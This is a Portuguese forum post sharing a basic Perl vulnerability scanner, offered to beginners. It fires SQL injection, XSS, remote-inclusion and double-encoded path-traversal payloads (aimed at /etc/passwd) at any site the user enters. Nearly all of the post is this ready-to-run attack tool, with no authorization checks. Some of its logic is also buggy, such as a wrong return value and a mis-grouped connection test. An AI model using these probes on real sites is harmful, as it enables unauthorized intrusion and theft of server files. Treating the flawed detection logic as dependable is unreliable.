Ola, esse e um basico VulScanner, ele pode ser otimo para quem esta tentando criar um e não sabe por onde começar
Código:
#!/usr/bin/perl #Coded by andreol263 if($^O ~~ /Win/){ $cl = 'cls'; }else{ $cl = 'clear'; } use LWP::UserAgent qw(request timeout); $ua = LWP::UserAgent->new; $ua->agent('Mozilla/5.0 (Windows NT 6.1; WOW64; rv:31.0) Gecko/20100101 Firefox/31.0'); system($cl); print "\tVulScanner\n\n"; print "[?]Which website will be scanned?\n"; chomp($site = <STDIN>); if($site !~ m(http://)){ $site = "http://" . $site; } sub webreq { $req = HTTP::Request->new; $req->method("GET"); $req->uri(@_); $res = $ua->request($req); if($res->is_success){ return $res->content; }else{ return "ERROR"; } } sub lfi_scanning { $vul = $_[0]; if($vul =~ /=[a-zA-Z0-9]+?/){ $vul =~ s/[a-zA-Z0-9]{1,}\Z//; } $lfi = $vul . "%2500..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252fetc%252fpasswd%2500"; $lfir = webreq($lfi); if($lfir =~ m((\w):\x:\d+:\d+)is){ $lf++; } return $lf; } sub rfi_scanning { $vul = $_[0]; if($vul =~ /=[a-zA-Z0-9]+?/){ $vul =~ s/[a-zA-Z0-9]{1,}\Z//; } $rfi = $vul . "www.google.com.br"; $repr = webreq($rfi); if($repr =~ m(http://schema.org/WebPage)){ $rf++; } return $rf++; } sub xss_scanning { $que = '"><script>alert(123);</script>'; $xss = $_[0] . $que; $xssr = webreq($xss); if($xssr =~ /$que/){ $xs++; } return $xs; } sub sqli_scanning { $sqli = $_[0] . "+/*!oRdEr*/+/*!bY*/+1000000--"; $resul = webreq($sqli); if ($resul =~ /mysql|SELECT|SQL|MSSQL|MySQL/gi){ $sq++; } return $sq; } print "[+]Testing Connection....\n"; if($site !~ /www|com|tk/){ die "[!]Wrong Input!\n"; }elsif($var = webreq($site) =~ /ERROR/){ die "[!]ERROR within Website!\n"; }else{ print "[+]The site is working perfectly!\n"; } print "[+]Now, testing in SQLi in site!\n"; if(sqli_scanning($site) != 0){ print "[+]SQLi found in $sqli\n\a"; }else{ print "[!]No SQLi found\n"; } print "[+]Testing XSS in website:\n"; if(xss_scanning($site) != 0){ print "[+]XSS found:$xss\n\a"; }else{ print "[!]No XSS!\n"; } print "[+]Searching RFI in site:\n"; if(rfi_scanning($site) != 0){ print "[+]RFI Found in:$vul\n\a"; }else{ print "[!]No RFI Vulnerability Found....\n"; } print "[+]LFI Searching in site:\n"; if(lfi_scanning($site) != 0){ print "[+]LFI Found in:$lfi\n\a"; }else{ print "[!]No one LFI found!\n"; }
Comment